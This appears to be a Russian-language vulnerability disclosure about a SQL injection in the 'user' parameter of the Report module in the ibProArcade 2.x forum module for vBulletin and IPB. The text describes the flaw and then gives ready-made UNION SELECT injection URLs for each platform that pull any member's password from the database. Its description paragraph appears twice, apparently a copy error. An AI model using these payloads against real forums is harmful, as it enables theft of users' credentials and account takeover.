Sql injection in ibProArcade.
Найдена уязвимость в популярном форумном модуле ibProArcade 2.x (для vBulletin и для IPB). Классифицируется баг, как средней критичности.
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Существует уязвимость в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Инъекция:
Запрос:
Найдена уязвимость в популярном форумном модуле ibProArcade 2.x (для vBulletin и для IPB). Классифицируется баг, как средней критичности.
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Существует уязвимость в модуле “Report” при обработке входных данных в параметре user сценария index.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Инъекция:
Код:
module=report&user=[userid]
Код:
IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]
vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]